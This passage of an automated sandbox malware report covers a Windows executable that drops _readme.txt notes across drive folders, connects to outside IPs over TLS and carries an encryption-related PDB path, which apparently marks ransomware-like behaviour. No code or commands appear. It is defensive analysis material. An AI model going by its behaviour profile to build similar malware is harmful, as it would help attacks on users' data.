          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeUnpacked PE file: 20.2.E0tabE4K4r.exe.400000.0.unpack
          Source: E0tabE4K4r.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeFile created: C:\Users\user\_readme.txtJump to behavior
          Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.11:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.11:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.11:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.11:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.11:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.11:49739 version: TLS 1.2
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\w\ source: E0tabE4K4r.exe, 00000006.00000003.1924983345.00000000036F9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: E0tabE4K4r.exe, 00000006.00000003.1764092521.0000000003115000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ c source: E0tabE4K4r.exe, 00000006.00000003.1872102730.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1872748425.0000000003648000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: E0tabE4K4r.exe, 00000006.00000003.1838388876.0000000003709000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.cdqw source: E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: E0tabE4K4r.exe, 00000006.00000003.1820263634.0000000003709000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1887923185.0000000003A0D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ov source: E0tabE4K4r.exe, 00000006.00000003.1887923185.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1893248676.0000000003A45000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\C\mk?v' source: E0tabE4K4r.exe, 00000006.00000003.1900876731.0000000003960000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Ij1fw source: E0tabE4K4r.exe, 00000006.00000003.1887923185.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1893248676.0000000003A45000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\re\ source: E0tabE4K4r.exe, 00000006.00000003.1818963337.0000000003613000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\T source: E0tabE4K4r.exe, 00000006.00000003.1887923185.0000000003A0D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\a source: E0tabE4K4r.exe, 00000006.00000003.1853394387.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852569222.00000000035D8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\es\. source: E0tabE4K4r.exe, 00000006.00000003.1924950025.00000000039BD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\.logP; source: E0tabE4K4r.exe, 00000006.00000003.1763426037.000000000317E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763857201.0000000003188000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1615800214.0000000003194000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: E0tabE4K4r.exe, 00000006.00000003.1765480086.0000000003139000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\2t|/ source: E0tabE4K4r.exe, 00000006.00000003.1853583168.0000000003115000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1840465889.0000000003128000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1872586744.0000000003110000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\0Ud} source: E0tabE4K4r.exe, 00000006.00000003.1852569222.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1818963337.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1839010273.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852859867.000000000368D000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819328681.0000000003664000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1854650583.0000000003694000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: E0tabE4K4r.exe, 00000006.00000003.1852901443.000000000378E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852217055.000000000370D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: E0tabE4K4r.exe, E0tabE4K4r.exe, 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000007.00000002.1281381535.0000000002280000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 0000000D.00000002.2485636228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000010.00000002.1396247343.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000011.00000002.1406738224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000013.00000002.1480789200.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1901213675.0000000003603000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1894086061.0000000003603000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\= source: E0tabE4K4r.exe, 00000006.00000003.1854428901.0000000003958000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853741689.0000000003951000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Burn\d.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1930135504.0000000003994000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1930586659.0000000003994000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C2\\ source: E0tabE4K4r.exe, 00000006.00000003.1893459042.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1899749395.00000000039EC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1893613345.00000000039DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tion source: E0tabE4K4r.exe, 00000006.00000003.1871477613.000000000374A000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1872238803.00000000037AE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.cdqw source: E0tabE4K4r.exe, 00000006.00000003.1763959319.0000000003648000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1853284820.0000000003192000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1871594993.0000000003197000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852996109.0000000003136000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853232093.000000000313E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853319194.000000000319F000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853859543.00000000031A1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\47\> source: E0tabE4K4r.exe, 00000006.00000003.1616546391.0000000003115000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: E0tabE4K4r.exe, 00000006.00000003.1888978285.0000000003624000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1889582927.0000000003624000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C source: E0tabE4K4r.exe, 00000006.00000003.1854872315.0000000003651000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852569222.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1854004621.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1839010273.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853107330.0000000003648000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1924950025.00000000039BD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: E0tabE4K4r.exe, 00000006.00000003.1888230622.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1889328606.00000000039E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\M)%|A source: E0tabE4K4r.exe, 00000006.00000003.1888978285.0000000003624000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1889582927.0000000003624000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: E0tabE4K4r.exe, 00000006.00000003.1536537481.00000000035A0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\V source: E0tabE4K4r.exe, 00000006.00000003.1887923185.0000000003A0D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\es\\v source: E0tabE4K4r.exe, 00000006.00000003.1888096848.0000000003985000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\* source: E0tabE4K4r.exe, 00000006.00000003.1840067885.000000000374A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: E0tabE4K4r.exe, 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000007.00000002.1281381535.0000000002280000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 0000000D.00000002.2485636228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000010.00000002.1396247343.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000011.00000002.1406738224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000013.00000002.1480789200.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\os=~ source: E0tabE4K4r.exe, 00000006.00000003.1888096848.0000000003985000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133494501122004824.txtng source: E0tabE4K4r.exe, 00000006.00000003.1763817024.0000000003147000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763893002.000000000314B000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1765255772.000000000314C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: E0tabE4K4r.exe, 00000006.00000003.1763426037.000000000317E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763857201.0000000003188000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1615800214.0000000003194000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\* source: E0tabE4K4r.exe, 00000006.00000003.1819763925.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763103396.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819912716.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763722153.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1765648554.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1820389653.00000000035EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: E0tabE4K4r.exe, 00000006.00000003.1871833943.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ewy\ source: E0tabE4K4r.exe, 00000006.00000003.1930785375.0000000003188000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000002.1933888911.0000000003189000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\47\H source: E0tabE4K4r.exe, 00000006.00000003.1765480086.0000000003139000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1588022675.0000000003136000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1616546391.0000000003115000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1587983645.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1924983345.00000000036F9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: E0tabE4K4r.exe, 00000006.00000003.1900272839.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1930481237.0000000003AF1000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1923741980.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\G3 source: E0tabE4K4r.exe, 00000006.00000003.1930135504.0000000003994000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1930586659.0000000003994000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\* source: E0tabE4K4r.exe, 00000006.00000003.1839357161.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819763925.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1839396918.00000000035F3000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819815577.00000000035F3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1852569222.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1818963337.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1839010273.0000000003648000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852859867.000000000368D000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819328681.0000000003664000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1854650583.0000000003694000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1818963337.0000000003613000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: E0tabE4K4r.exe, 00000006.00000003.1820263634.0000000003709000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\AC\ source: E0tabE4K4r.exe, 00000006.00000003.1893459042.0000000003921000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1889475372.0000000003931000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb\IDX_CONTENT_TASKBARHEADLINES.jsontxt\ source: E0tabE4K4r.exe, 00000006.00000003.1763817024.0000000003147000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763893002.000000000314B000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1765255772.000000000314C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\6] source: E0tabE4K4r.exe, 00000006.00000003.1820689174.0000000003174000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819425961.0000000003169000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1820655737.000000000316F000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1818903237.0000000003136000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\p source: E0tabE4K4r.exe, 00000006.00000003.1871833943.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\H source: E0tabE4K4r.exe, 00000006.00000003.1889475372.0000000003931000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ata\P source: E0tabE4K4r.exe, 00000006.00000003.1765255772.0000000003148000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763817024.0000000003147000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1820362877.0000000003199000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819729818.0000000003197000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763426037.000000000317E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763857201.0000000003188000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819425961.0000000003169000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853284820.0000000003192000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852996109.0000000003136000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853232093.000000000313E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1839267370.000000000319D000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1818903237.0000000003136000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: E0tabE4K4r.exe, 00000006.00000003.1888230622.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1889328606.00000000039E4000.00000004.00000020.00020000.00000000.sdmp
